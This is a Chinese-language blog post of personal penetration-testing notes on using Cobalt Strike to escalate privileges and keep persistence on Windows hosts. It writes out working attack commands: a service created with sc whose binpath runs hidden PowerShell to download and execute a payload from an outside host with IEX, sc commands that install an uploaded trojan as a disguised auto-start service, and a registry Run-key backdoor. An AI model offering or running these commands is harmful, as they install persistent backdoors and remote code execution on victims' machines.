我的渗透笔记之cobaltstrike的提权以及维持权限

一、cobaltstrike的提权:
提权:简单来说就是将用户的操作权限提升至系统权限

操作:
下面这张图的权限为用户权限
在这里插入图片描述

点击提权后,选择提供的exp,过一会就会出现系统权限的shell
我的渗透笔记之cobaltstrike的提权以及维持权限_第1张图片
我的渗透笔记之cobaltstrike的提权以及维持权限_第2张图片
在这里插入图片描述

二、权限的维持
权限维持:简单来说就是让我们可以更久的控制一台电脑

操作:
1、创建监听后,我们要创建一个后门,在这里我们利用脚本攻击演示一下。
我的渗透笔记之cobaltstrike的提权以及维持权限_第3张图片

2、设置开机后自动启动脚本后门,点击目标中执行beacon命令。

使用SC命令创建windows服务名最好伪装下,binpath= 这里一定要注意有个空格,命令为如下(这里不要套用我的powershell代码,用你自己生成的)

然后成功生成一个name服务

shell sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.1.82:19001/a'))\"

我的渗透笔记之cobaltstrike的提权以及维持权限_第4张图片

设置name服务为自动:shell SC config "name" start= auto

设置服务描述:shell SC description "name" "description"

启动服务:shell net start "name”

删除服务:shell SC delete "name"

设置完后门服务后,目标主机重启后不断向攻击服务器发送数据
在这里插入图片描述

3、通过可执行文件留下维持权限的后门
首先我们先在目标主机上传一个木马,记住路径

然后对目标主机执行beacon命令:

shell sc create "server power" binpath= "C:\Users\Administrator\Desktop\artifact.exe(填写自己木马的路径)"
sc description "server power" "description" 设置服务的描述字符串
sc config "server power" start= auto 设置这个服务为自动启动
net start "server power" 启动服务 

4、通过注册表留后门
执行beacon命令

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\Administrator\Desktop\artifact1.exe"(自己木马路径) /f 

欢迎大家加入渗透学习交流群:1084999372
欢迎大家加入渗透学习交流群:1084999372
欢迎大家加入渗透学习交流群:1084999372

你可能感兴趣的:(安全,windows,经验分享)